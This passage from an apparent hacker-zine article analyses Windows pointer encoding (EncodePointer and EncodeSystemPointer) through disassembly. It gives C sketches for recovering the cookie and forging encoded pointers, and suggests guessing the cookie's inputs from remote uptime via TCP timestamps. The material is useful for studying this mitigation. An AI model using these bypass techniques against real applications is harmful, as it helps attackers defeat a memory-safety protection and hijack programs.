the function is basically a XOR of the pointer with a certain "magic value"
DWORD located at 0x7FFE0330. What lies there? Well, this is a certain value in
SharedUserData (_KUSER_SHARED_DATA), indeed, the SharedUserData region we
discussed in section [0x03]. As we can see, the value referred to in the
EncodeSystemPointer code is 0x7FFE0330, which is the base address of
SharedUserData + 0x330, which is the Cookie offset. This cookie is a magic value
which changes on reboot.

All processes have access to this Cookie, no matter what privileges. So local
attacks wouldn't be a problem since the exploit program would simply check the
value of *(DWORD*)(0x7ffe0330) and XOR the desired pointer overwrite address
with this cookie. Also, due to the static nature of this value during uptime,
eventually guessing it through bruteforce would be possible too.
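
Because the scheme is a bare XOR, a single known clear/encoded pair gives the
cookie away, and forging a value that decodes to an address of our choice is
one more XOR. A portable sketch (function names are hypothetical, and the
cookie is passed in as a parameter instead of being read from 0x7ffe0330):

```c
#include <stdint.h>

/* Encoding and decoding are the same operation. */
uint32_t xor_encode(uint32_t ptr, uint32_t cookie)
{
    return ptr ^ cookie;
}

/* One known clear/encoded pair reveals the cookie. */
uint32_t recover_cookie(uint32_t clear, uint32_t encoded)
{
    return clear ^ encoded;
}

/* Value to write over the stored pointer so that it decodes to `target`. */
uint32_t forge_encoded(uint32_t target, uint32_t cookie)
{
    return target ^ cookie;
}
```

As a sanity check, the numbers printed by the overflow run earlier in this
section behave exactly like this: 0x401290 and 0xc910c294 imply a cookie of
0xc950d004, and 0x41414141 XORed with that cookie gives the 0x88119145 seen
in the output.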

Now let us look at EncodePointer.
EncodePointer is located at 0x7C913917 in kernel32.dll on my box:

Disassembly:

7C913917 > 8BFF             MOV EDI,EDI
7C913919   55               PUSH EBP
7C91391A   8BEC             MOV EBP,ESP
7C91391C   51               PUSH ECX
7C91391D   6A 00            PUSH 0
7C91391F   6A 04            PUSH 4
7C913921   8D45 FC          LEA EAX,DWORD PTR SS:[EBP-4]
7C913924   50               PUSH EAX
7C913925   6A 24            PUSH 24
7C913927   6A FF            PUSH -1
7C913929   E8 EDA6FFFF      CALL ntdll.ZwQueryInformationProcess
7C91392E   8B45 FC          MOV EAX,DWORD PTR SS:[EBP-4]
7C913931   3345 08          XOR EAX,DWORD PTR SS:[EBP+8]
7C913934   C9               LEAVE
7C913935   C2 0400          RETN 4

DecodePointer:

7C91393D > 8BFF             MOV EDI,EDI
7C91393F   55               PUSH EBP
7C913940   8BEC             MOV EBP,ESP
7C913942   5D               POP EBP
7C913943  ^EB D2            JMP SHORT ntdll.RtlEncodePointer


As we can see DecodePointer is once again simply EncodePointer. Now, what
EncodePointer does is pretty simple, it makes a call like:

ntdll.ZwQueryInformationProcess(-1,0x24,dword ptr ss:[ebp-4],4,0)

Which is a simple query of information class 0x24 for the calling process
(0xFFFFFFFF == -1 == CurrentProcess handle). Note that the debugger prints its
operands in hex: class 0x24 is 36 decimal, which is ProcessCookie in the
PROCESSINFOCLASS enumeration, whereas ProcessSessionInformation is 24 decimal.
The returned value is therefore the per-process cookie, not the session ID
stored in the ProcessEnvironmentBlock (PEB). The ReactOS (OpenSource WinNT
compatible implementation) kernel source for ZwQueryInformationProcess is a
handy reference for how the individual information classes are served.

Now this value is pretty tricky due to its very random nature, but apparently
it's constructed in the following manner upon process creation.

  o The higher portion of the system tick count 
    (100 nano-second tick count since Jan 01, 1601)        XOR
  o The lower portion the system tick count                XOR
  o The interrupt time (number of ticks during interrupts) XOR
  o The number of system calls since system boot           XOR
  o The (ULONG)rdtsc CPU value                             XOR
  o The memory manager page fault count 

This result is then rotated right on encode using Cookie%(sizeof(ULONG_PTR)*8).
In pseudocode on a 32-bit CPU, encoding looks like this:

  Ptrenc = (Ptrclear ^ Cookie) >>> (Cookie % 32) 
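
A minimal 32-bit sketch of that pseudocode and its inverse, with the cookie
passed in as a parameter. This only models the formula as written above, not
the actual system routine, and the function names are invented. Note that
with a rotation in play, decoding is no longer the same operation as
encoding: the rotation has to be undone first.

```c
#include <stdint.h>

static uint32_t rotr32(uint32_t v, unsigned n)
{
    n &= 31;
    return n ? (v >> n) | (v << (32 - n)) : v;
}

static uint32_t rotl32(uint32_t v, unsigned n)
{
    n &= 31;
    return n ? (v << n) | (v >> (32 - n)) : v;
}

/* Ptrenc = (Ptrclear ^ Cookie) >>> (Cookie % 32) */
uint32_t encode_pointer(uint32_t ptr, uint32_t cookie)
{
    return rotr32(ptr ^ cookie, cookie % 32);
}

/* Inverse: rotate left by the same amount, then XOR with the cookie. */
uint32_t decode_pointer(uint32_t encoded, uint32_t cookie)
{
    return rotl32(encoded, cookie % 32) ^ cookie;
}
```

With a cookie of 0xc950d004 the rotation count is 4, so 0x00401290 encodes to
0x4c910c29 and decodes back to 0x00401290.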

The reason for the rotation is to make it harder to target partial pointer
overwrites, because target bits are in an unknown position in the encoded
pointer. Now we could simply bruteforce this value but there are ways to be more
efficient in our bruteforce. If we could determine any of the values used for
cookie generation, bruteforcing would be a tad easier, because if with:

 (w ^ x ^ y ^ z ^ a ^ b)

w and x are known (or approximated), it leaves us with less to bruteforce. Now,
we can attempt to determine these values remotely through uptime fingerprinting.
If we can determine the target machine's uptime, we can approximate the first
two values.

Locally determining the system uptime is possible by calling the
NtQuerySystemInformation native API with the SystemTimeOfDayInformation system
information class. This will return the system boottime in 100 nanosecond
intervals, from which determining the system uptime is trivial.

Remotely determining uptime is possible through the TCP Timestamps Option
(TSopt) described in RFC 1323. This is possible because the way operating
systems manage their TCP timestamping allows a remote client to guess, if he
recognizes the operating system through OS fingerprinting, the machine's
uptime. BSD, for example, increments the timestamp value by one point each 500
milliseconds. The optional TCP field looks like this:

    1        1             4                         4
   +--------+-------------+-----------------------+--------------------------+
   | Kind=8 |   size=10   |   TS Value (TSval)    | TS Echo Reply (TSecr)    |
   +--------+-------------+-----------------------+--------------------------+


We need to keep in mind the following things though:

The length of a timestamp value in a TCP packet is 4 bytes, so it will roll over
when the value crosses the limit of 2^32. Also, Windows does not instantly start
to increase the timestamp once the system has been booted up. nmap uses this
technique and does pretty well (for Windows as well, despite the aforementioned
issue), so if you're interested in implementing this as a function in your
exploit trying to beat EncodePointer secured applications, you should take a
look at nmap's uptime guessing routines.
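
The basic idea can be sketched in a few lines: pull TSval out of the option,
estimate the tick rate from two samples taken a known time apart, and divide.
This is a simplified illustration with made-up function names, not nmap's
algorithm, and it ignores the rollover and delayed-start caveats just
mentioned.

```c
#include <stddef.h>
#include <stdint.h>

/* Parse a TCP Timestamps option (kind 8, length 10).
   Returns 1 and stores TSval on success, 0 otherwise. */
int parse_tsopt(const unsigned char *opt, size_t len, uint32_t *tsval)
{
    if (len < 10 || opt[0] != 8 || opt[1] != 10)
        return 0;
    *tsval = ((uint32_t)opt[2] << 24) | ((uint32_t)opt[3] << 16) |
             ((uint32_t)opt[4] << 8)  |  (uint32_t)opt[5];
    return 1;
}

/* Tick rate estimated from two TSval samples taken seconds_between apart. */
double ticks_per_second(uint32_t ts1, uint32_t ts2, double seconds_between)
{
    return (double)(uint32_t)(ts2 - ts1) / seconds_between;
}

/* Uptime estimate, assuming the counter started near zero at boot. */
double uptime_seconds(uint32_t tsval, double hz)
{
    return (double)tsval / hz;
}
```

With the BSD rate from the text (one increment per 500 milliseconds, so 2 per
second), a TSval of 3600 corresponds to roughly 1800 seconds of uptime.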

The rdtsc CPU value is simply a timestamp counter which represents the count of
ticks from processor reset.

So if we manage to obtain the uptime, and we can safely assume uptime and
process creation time are close to each other, we can make an approximation of
at least 3 values remotely.

Now these techniques are not very accurate, but might help you exploit
applications employing pointer encoding.



--[ 0x05 ]------------------------------------------[ Greetings 'n shoutz ]-----

Greets and shouts go to Nullsec, the whole .aware/xzziroz community, The
HackThisSite collective, RRLF, 29A, The entire SmashTheStack crew, PullThePlug ,
BinaryShadow Organization, #dutch crew, Vx.netlux folks/Undernet VX crew,
blacksecurity and all "true" hackers out there.

This page is part of the .aware network. Content and design © 2004 - 2010 .aware network
Due to certified insanity, we are not responsible for anything, period.